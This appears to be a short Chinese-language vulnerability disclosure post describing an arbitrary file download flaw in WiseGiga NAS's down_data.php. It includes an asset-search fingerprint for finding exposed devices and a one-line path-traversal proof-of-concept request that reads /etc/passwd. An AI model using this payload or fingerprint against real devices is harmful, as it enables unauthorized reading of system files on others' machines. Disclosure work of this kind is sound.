WiseGiga NAS down_data.php 任意文件下载漏洞
# WiseGiga NAS down_data.php 任意文件下载漏洞
## 漏洞描述
WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏...
WiseGiga NAS down_data.php 任意文件下载漏洞
漏洞描述
WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。
漏洞影响
WiseGiga NAS
网络测绘
app="WISEGIGA-NAS"
漏洞复现
主页面
验证POC
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
- 发表于 2024-07-12 18:47:49
- 阅读 ( 2051 )
- 分类:Web应用
带头大哥
456 篇文章